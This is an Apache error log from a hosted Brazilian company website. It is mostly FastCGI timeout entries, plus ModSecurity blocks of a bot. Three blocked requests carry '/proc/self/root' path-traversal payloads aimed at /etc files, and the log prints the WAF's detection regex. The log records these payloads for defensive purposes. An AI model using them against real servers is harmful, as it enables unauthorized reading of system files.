[Fri Mar 20 00:19:28.025825 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37262] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:19:51.053820 2026] [proxy_fcgi:error] [pid 7235:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38086] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:20:17.136822 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38856] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:20:48.117966 2026] [proxy_fcgi:error] [pid 7893:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39882] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:21:14.069828 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40594] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:21:44.157848 2026] [proxy_fcgi:error] [pid 20435:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41308] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:22:10.477881 2026] [proxy_fcgi:error] [pid 20435:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41978] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:22:39.906914 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42322] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:23:34.633813 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42420] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:24:28.127392 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43080] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:25:16.333902 2026] [proxy_fcgi:error] [pid 20435:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43318] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:25:40.509830 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43418] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:26:20.109495 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43452] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:27:15.569776 2026] [proxy_fcgi:error] [pid 21563:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:43508] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:28:11.905893 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:43640] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:28:57.537879 2026] [proxy_fcgi:error] [pid 21219:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43708] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:29:52.007202 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43818] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:30:35.429858 2026] [proxy_fcgi:error] [pid 21219:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43918] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:31:51.285875 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44012] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:32:19.701867 2026] [proxy_fcgi:error] [pid 21563:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44148] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:33:11.959608 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44274] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:33:58.543596 2026] [proxy_fcgi:error] [pid 8307:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44358] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:34:54.500989 2026] [proxy_fcgi:error] [pid 8307:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44504] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:35:43.594221 2026] [proxy_fcgi:error] [pid 20435:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44634] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:36:43.033849 2026] [proxy_fcgi:error] [pid 21219:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44780] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:37:18.613928 2026] [proxy_fcgi:error] [pid 19655:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44892] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:38:13.589948 2026] [proxy_fcgi:error] [pid 20435:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45000] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:38:46.257791 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45100] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:40:22.433883 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45222] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:41:09.674708 2026] [proxy_fcgi:error] [pid 8307:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45468] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:42:18.673935 2026] [proxy_fcgi:error] [pid 19655:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45718] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:43:49.807330 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45866] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:44:50.373286 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46116] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:45:29.121278 2026] [proxy_fcgi:error] [pid 7235:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46292] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:47:15.465808 2026] [proxy_fcgi:error] [pid 8307:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46444] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:48:27.825937 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46652] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:49:15.949826 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46788] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:50:10.565877 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46904] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:51:09.849863 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47022] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:52:10.749859 2026] [proxy_fcgi:error] [pid 21563:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47146] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:52:44.219568 2026] [access_compat:error] [pid 17887:tid 140411632822016] [client 80.97.160.166:51980] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/click.php, referer: https://bandeirantesbombas.com.br/click.php
[Fri Mar 20 00:52:48.217995 2026] [access_compat:error] [pid 30077:tid 140411557287680] [client 80.97.160.166:51994] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/mah.php, referer: https://bandeirantesbombas.com.br/mah.php
[Fri Mar 20 00:52:48.868116 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.244.43:52004] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzEkBCii7xarUs8iHYdUwAAAgM"]
[Fri Mar 20 00:53:06.053822 2026] [proxy_fcgi:error] [pid 8307:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47322] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:53:55.814078 2026] [proxy_fcgi:error] [pid 21563:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47418] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:54:57.489839 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47514] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:55:54.341823 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47674] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:56:37.953081 2026] [proxy_fcgi:error] [pid 21219:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47748] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:57:15.505901 2026] [proxy_fcgi:error] [pid 7545:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47838] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:57:38.585826 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48400] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:58:18.361106 2026] [:error] [pid 19655:tid 140411624429312] [client 74.7.244.43:52228] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzF2k1ujooLWdUDGy4IbAAAAE4"]
[Fri Mar 20 00:58:55.930539 2026] [proxy_fcgi:error] [pid 21563:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48554] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:00:05.986425 2026] [proxy_fcgi:error] [pid 19655:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48728] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:01:32.261937 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48812] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:02:15.613852 2026] [proxy_fcgi:error] [pid 7545:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48940] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:03:16.197878 2026] [proxy_fcgi:error] [pid 7235:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49000] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:03:56.049813 2026] [proxy_fcgi:error] [pid 21563:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49350] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:05:07.121964 2026] [proxy_fcgi:error] [pid 19655:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49458] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:06:21.537860 2026] [proxy_fcgi:error] [pid 19655:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49576] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:07:06.017848 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49666] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:08:16.309845 2026] [proxy_fcgi:error] [pid 7235:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49766] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:08:31.003191 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.244.43:52732] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzIPxCii7xarUs8iHYdhQAAAg8"]
[Fri Mar 20 01:08:56.789856 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49994] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:09:23.497969 2026] [proxy_fcgi:error] [pid 5816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50076] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:09:58.593949 2026] [proxy_fcgi:error] [pid 20435:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50136] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:11:53.893876 2026] [proxy_fcgi:error] [pid 19655:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50198] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:12:31.313807 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50436] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:12:35.908005 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.228.61:43662] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzJMwbLMZ6AikZjR9WRIgAAAAU"]
[Fri Mar 20 01:12:53.121948 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51042] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:13:14.128120 2026] [proxy_fcgi:error] [pid 21563:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51240] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:13:35.125919 2026] [proxy_fcgi:error] [pid 7893:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51416] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:13:56.125899 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51616] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:14:17.062069 2026] [proxy_fcgi:error] [pid 21563:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51812] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:15:35.539316 2026] [proxy_fcgi:error] [pid 20435:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51844] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:16:35.553848 2026] [proxy_fcgi:error] [pid 20435:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52010] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:17:17.845830 2026] [proxy_fcgi:error] [pid 8307:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52084] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:17:39.057851 2026] [proxy_fcgi:error] [pid 20435:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52464] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:18:00.049541 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52570] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:18:55.537809 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52630] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:19:17.041882 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52858] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:19:46.845912 2026] [proxy_fcgi:error] [pid 8307:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52980] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:20:39.763201 2026] [proxy_fcgi:error] [pid 19655:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53024] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:21:35.665804 2026] [proxy_fcgi:error] [pid 20435:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53270] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:22:23.481157 2026] [proxy_fcgi:error] [pid 7235:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53362] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:23:55.523679 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53490] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:25:17.145824 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53624] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:25:47.325891 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53794] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:26:13.717917 2026] [proxy_fcgi:error] [pid 7893:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53906] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:27:01.409800 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53950] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:27:23.389782 2026] [proxy_fcgi:error] [pid 7235:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54054] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:28:55.637784 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54276] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:29:50.955366 2026] [:error] [pid 5816:tid 140411582465792] [client 74.7.228.61:55260] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzNPpfmNfuxceSuAELIAgAAAdM"]
[Fri Mar 20 01:30:02.586632 2026] [proxy_fcgi:error] [pid 20435:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54432] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:30:56.309895 2026] [proxy_fcgi:error] [pid 21563:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54532] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:31:51.279546 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54748] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:31:53.186710 2026] [:error] [pid 19655:tid 140411590858496] [client 74.7.244.43:40262] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzNuU1ujooLWdUDGy4JLQAAAFI"]
[Fri Mar 20 01:32:14.333848 2026] [proxy_fcgi:error] [pid 5816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55162] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:32:36.133947 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55596] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:32:57.129828 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55902] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:33:20.481950 2026] [proxy_fcgi:error] [pid 20435:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56158] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:33:42.045915 2026] [proxy_fcgi:error] [pid 7893:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56360] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:34:04.329872 2026] [proxy_fcgi:error] [pid 8307:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56656] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:34:10.795011 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:51116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzOQsdf6f5d65gmYZSt1gAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:34:26.123203 2026] [proxy_fcgi:error] [pid 7235:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56864] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:34:31.349667 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.241.31:51924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzOVwbLMZ6AikZjR9WR1AAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:34:47.069820 2026] [proxy_fcgi:error] [pid 7235:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57058] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:34:50.919455 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:59420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzOavqxLDW4GITHUkSeBwAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:34:58.400276 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.228.61:34304] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzOcgkwaGbbGflqUZD_cQAAAMc"]
[Fri Mar 20 01:35:08.137830 2026] [proxy_fcgi:error] [pid 5816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57288] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:35:29.076014 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57664] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:35:52.081852 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58056] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:36:13.138327 2026] [proxy_fcgi:error] [pid 19655:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58352] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:36:34.038345 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:58628] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:36:56.141782 2026] [proxy_fcgi:error] [pid 5816:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58956] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:37:02.202073 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.244.43:58624] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzO7v-YZRR_7pZ7nDLBUgAAA8Q"]
[Fri Mar 20 01:37:17.133780 2026] [proxy_fcgi:error] [pid 21219:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59256] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:37:38.373804 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59626] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:38:00.129793 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60044] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:38:21.134187 2026] [proxy_fcgi:error] [pid 21219:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60434] AH01075: Error dispatching request to : (polling)
